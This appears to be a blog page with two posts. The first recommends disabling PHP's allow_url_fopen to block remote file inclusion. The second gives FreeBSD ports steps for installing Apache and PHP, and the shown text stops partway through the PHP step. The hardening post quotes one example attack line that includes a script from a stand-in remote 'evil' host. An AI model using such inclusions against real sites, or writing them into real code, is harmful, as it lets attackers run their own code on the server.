blog.up-link.ro android bsd linux unix & open-source world

13Apr/106

PHP Security Tips – Securing PHP by hardening PHP configuration

When it comes to security, ignorance is definitely not blissful. There are several methods to increase the security of your PHP environment.

In this article I will discuss how to secure PHP by hardening PHP 5 configuration.

1. allow_url_fopen ( enabled by default )

This directive allows PHP's file functions ( file_get_contents, include and require statements ) to retrieve data from remote locations, like FTP or HTTP.

If an attacker can manipulate the arguments to those functions, they can use a URL under their control as the argument and run their own remote scripts. The vulnerability is called Remote file inclusion or RFI.

; Disable allow_url_fopen in php.ini for security reasons
allow_url_fopen = Off

The setting can also be applied in apache's httpd.conf :

# Disable allow_url_fopen for security reasons
php_admin_flag allow_url_fopen Off

It prevents URLs from being used in PHP. A command like include ("http://www.example.com/evil_script.php") will not be allowed to execute. Only files that reside within your site can be included: include("/var/www/html/config.inc.php").

Print This Post Print This Post
24Mar/100

Apache HTTP Server + PHP 5 + MySQL Installation in FreeBSD

1. Install Apache HTTP Server
Go to apache22 port:
# cd /usr/ports/www/apache22
and type:
# make config

Now you can choose the options from the menu.
# make install clean

To enable apache on boot, add the following line to /etc/rc.conf
apache22_enable="YES"

To start apache http server, type
# /usr/local/etc/rc.d/apache22 start

2. Install PHP 5
Go to php port:
# cd /usr/ports/lang/php5
and type:

Print This Post Print This Post